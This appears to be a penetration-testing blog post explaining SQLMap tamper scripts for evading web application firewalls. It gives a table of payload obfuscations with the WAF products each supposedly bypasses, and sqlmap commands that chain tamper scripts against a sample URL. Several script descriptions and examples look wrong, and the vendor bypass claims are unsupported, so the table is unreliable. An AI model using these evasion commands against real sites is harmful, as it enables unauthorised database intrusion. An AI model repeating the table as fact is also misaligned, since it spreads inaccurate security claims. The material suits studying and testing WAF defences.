Author: Trix Cyrus
Waymap Pentesting tool: Click Here
TrixSec Github: Click Here
TrixSec Telegram: Click Here
SQLMap is one of the most powerful tools for automated SQL injection testing, but when faced with robust Web Application Firewalls (WAFs), its default payloads might not always bypass detection. That’s where tamper scripts come into play. These scripts tweak SQLMap's payloads to evade WAFs and unlock access to vulnerabilities that might otherwise remain hidden.
This guide dives deep into SQLMap's tamper scripts, explaining their functionality, how they modify payloads, and which WAFs they can bypass. Whether you're a penetration tester or a cybersecurity enthusiast, mastering these scripts is essential for maximizing SQLMap's potential.
The Complete Tamper Script Table
Here’s a curated table that organizes tamper scripts, their functionality, modifications to payloads, and the WAFs they target:
| Tamper Script | Functionality | Payload Modification | WAFs It Can Bypass |
|---|---|---|---|
apostrophemask.py |
Masks single quotes in payloads by encoding them as UTF-8. | Converts ' to %27. |
ModSecurity, AWS WAF |
base64encode.py |
Encodes the entire payload using Base64 encoding. | Transforms payload to Base64 format, e.g., UNION SELECT -> VU5JT04gU0VMRUNU. |
Cloudflare, Barracuda WAF |
between.py |
Replaces = with the BETWEEN clause. |
Converts WHERE id=1 to WHERE id BETWEEN 0 AND 2. |
Barracuda, FortiWAF |
charunicodeencode.py |
Encodes characters in the payload to their Unicode format. | Converts SELECT to \u0053\u0045\u004c\u0045\u0043\u0054. |
ModSecurity, Imperva, Cloudflare |
chardoubleencode.py |
Double URL encodes characters to bypass filters. | Converts %27 to %2527. |
ModSecurity, AWS WAF, Imperva |
commalessunion.py |
Rewrites UNION SELECT queries to avoid using commas. |
Converts UNION SELECT 1,2,3 to UNION SELECT 1 UNION SELECT 2 UNION SELECT 3. |
Cloudflare, ASP.NET WAF |
equaltolike.py |
Replaces = with LIKE. |
Converts WHERE id=1 to WHERE id LIKE 1. |
Akamai, FortiWAF |
greatest.py |
Uses the GREATEST function to obfuscate payloads. |
Converts OR 1=1 to OR 1=GREATEST(1,2-1). |
F5 Big-IP ASM, Imperva |
lowercase.py |
Converts all SQL keywords to lowercase. | Converts SELECT to select. |
ModSecurity, Cloudflare |
overlongutf8.py |
Uses overlong UTF-8 encoding to encode characters. | Converts ' to %C0%A7. |
ModSecurity, Imperva, ASP.NET WAF |
randomcase.py |
Randomizes the case of characters in SQL keywords. | Converts SELECT to sElEcT. |
Cloudflare, Barracuda WAF |
space2comment.py |
Replaces spaces with inline comments (/**/). | Converts SELECT 1 FROM table to SELECT/**/1/**/FROM/**/table. |
Cloudflare, Akamai |
space2hash.py |
Replaces spaces with hash (#) comments. | Converts SELECT 1 FROM table to SELECT#1#FROM#table. |
ModSecurity, Cloudflare |
space2dash.py |
Replaces spaces with dashes (-). | Converts SELECT * FROM users to SELECT-*--FROM-users. |
FortiWAF, Cloudflare |
multiplespaces.py |
Inserts multiple spaces between keywords. | Converts SELECT * FROM users to SELECT * FROM users. |
F5, Barracuda |
nonrecursivereplacement.py |
Replaces UNION SELECT with UNION ALL SELECT. |
Converts UNION SELECT username, password to UNION ALL SELECT username, password. |
Imperva, F5 |
space2tab.py |
Replaces spaces with tab characters (\t). | Converts SELECT * FROM users to SELECT\t*\tFROM\tusers. |
Cloudflare, Imperva |
charencode.py |
URL-encodes the entire payload. | Converts SELECT * FROM users to %53%45%4C%45%43%54%20%2A%20%46%52%4F%4D%20%75%73%65%72%73
|
Akamai, Barracuda |
versionedkeywords.py |
Adds versioned keywords like /*!50000 SELECT */. |
Converts SELECT to /*!50000 SELECT */. |
ModSecurity, Cloudflare, Imperva |
Here is the image of this save it
How to Use Tamper Scripts with SQLMap
SQLMap makes it easy to use tamper scripts during testing. Simply use the --tamper flag followed by the name of the script:
sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=space2comment
You can even chain multiple scripts to maximize obfuscation:
sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=randomcase,space2dash
Key Use Cases
-
Bypassing Specific WAFs
- If a WAF is blocking common SQL keywords, try using
randomcase.pyorcharunicodeencode.pyto alter their appearance.
- If a WAF is blocking common SQL keywords, try using
-
Evading Blacklists
- Scripts like
apostrophemask.pyandspace2hash.pyare effective for bypassing blacklist-based filtering.
- Scripts like
-
Testing WAF Configurations
- Use tamper scripts to analyze which rules are implemented in the WAF and where its weaknesses lie.
Pro Tips for Effective Testing
- Understand the Target WAF: Research the WAF type and rules it enforces to choose the right tamper scripts.
- Experiment with Chaining: Combining multiple tamper scripts often yields better results.
- Always Document Findings: Record the scripts and payloads used for effective reporting.
Closing Thoughts
Tamper scripts are a game-changer for SQLMap users, enabling advanced payload obfuscation and WAF evasion. By understanding the nuances of each script, penetration testers can bypass even the most robust defenses. However, always remember to use these tools ethically and responsibly to enhance security rather than exploit it.
"Stay curious, stay ethical, and keep testing."
~Trixsec
Top comments (0)